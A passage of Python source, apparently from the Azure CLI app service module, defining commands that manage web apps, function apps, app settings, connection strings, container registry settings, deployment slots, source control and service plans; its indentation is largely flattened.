return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    return _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
result = list(client.deleted_web_apps.list())
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
    # and there is no simple functional replacement for this deprecated method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
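# Illustrative sketch (not part of the original module): _format_fx_version normalizes a
# container image reference (or an encoded multicontainer config) into the fx-version
# string stored in site config. The image names below are hypothetical.
def _example_fx_version_formatting():
    assert _format_fx_version('nginx') == 'DOCKER|nginx'
    assert _format_fx_version('DOCKER|nginx') == 'DOCKER|nginx'
    assert _format_fx_version('encodedcompose', 'COMPOSE') == 'COMPOSE|encodedcompose'
    assert _format_fx_version('   ') == ' '  # blank input clears the setting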
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None,
linux_fx_version=None, windows_fx_version=None, php_version=None, python_version=None, # pylint: disable=unused-argument
net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None, # pylint: disable=unused-argument
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
    # and there is no simple functional replacement for this deprecated method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
    if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings | --slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Both --multicontainer-config-type TYPE and --multicontainer-config-file FILE must be specified')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
    # logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
clone_from_prod = None
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
if configuration_source:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
result.name = result.name.split('/')[-1]
return result
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(cmd, resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
else:
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
            raise CLIError('The following parameters are of no use when cd_project_url is None: ' +
                           'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
                           'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors, re-raise immediately; for server errors (50x), retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list())
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, sku='B1', number_of_workers=None,
location=None, tags=None):
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
sku = _normalize_sku(sku)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
admin_site_name=None):
sku_def = instance.sku
if sku is not None:
